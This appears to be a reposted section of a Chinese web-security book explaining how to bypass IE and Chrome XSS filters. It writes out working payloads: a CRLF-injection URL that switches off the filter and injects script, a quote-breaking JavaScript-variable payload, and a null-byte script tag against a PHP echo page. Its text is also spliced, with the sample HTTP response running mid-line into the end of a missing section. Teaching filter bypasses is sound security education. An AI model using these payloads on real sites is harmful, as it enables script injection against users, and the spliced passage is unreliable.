返回介绍

6.6 绕过浏览器 XSS Filter

发布于 2024-01-20 15:41:03 字数 1874 浏览 0 评论 0 收藏 0

目前,主要是IE和Chrome两大浏览器拥有XSS Filter机制,不可能有完美的过滤器,从历史上看,它们被绕过很多次,同时也越来越完善,但是总会有被绕过的可能性,绕过的方式同样可以通过fuzzing技巧来寻找。

XSS Filter主要针对反射型XSS,大体上采用的都是一种启发式的检测,根据用户提交的参数判断是否是潜在的XSS特征,并重新渲染响应内容保证潜在的XSS特征不会触发。

6.6.1 响应头CRLF注入绕过

如果目标网页存在响应头部CRLF注入,在HTTP响应头注入回车换行符,就可以注入头部:

X-XSS-Protection: 0

用于关闭XSS Filter机制,这也是一种绕过方式。比如,某网站的页面可以写如下请求语句:

http://x.com/xx.action?id=%0d%0aContent-Type:
%20text/html%0d%0aX-XSS
-Protection:%200%0d%0a%0d%0ax%3Cscript
%3Ealert(1);%3C/script%3Ey

这段URL如果在urldecode后是如下内容:

http://x.com/xx.action?id=
Content-Type: text/html
X-XSS-Protection: 0
x<script>alert(1);</script>y

响应回来的内容会如下:

HTTP/1.1 404
Content-Type: text/html
X-XSS-Protection: 0
x<script>alert(1);</script>y
Server: Resin/3.0.19
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
Content-Length: 0
Connection: close
Date: Thu, 07 Jun 2012 06:39:16 GMT容,可以参考10.1.2节)的影响。

6.6.3 场景依赖性高的绕过

1. 场景一

我们发现一个反射型XSS的参数值出现在JavaScript变量里,格式如下:

<script>
var a='[userinput]';
...
</script>

提交xxx.php?userinput=';alert(123)//,得到如下语句:

<script>
var a='';alert(123)//';
...
</script>

对于这样的场景,Chrome的XSS Filter就无法有效地防御了,IE却可以。

2. 场景二

安全研究员sogl发现的这样的绕过经测试,如果PHP开启的GPC魔法引号,那么下面这样的URL可以绕过IE XSS Filter:

http://www.foo.com/xss.php?x=<script%00%00%00>alert(1)</script>

xss.php代码如下:

<?php echo $_GET['x'] ?>

原因是:%00会被PHP转义为\0,IE XSS Fil-ter估计就因此被绕过,最终的输出结果是:

<script \0\0\0>alert(1)</script>

除此之外,还有以下一些特性:

· IE对DOM XSS没有防御策略,但是Chrome却有。

· Chrome还支持注入data:协议的XSS,不过data:协议是空白域,不会对目标造成大的影响。

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文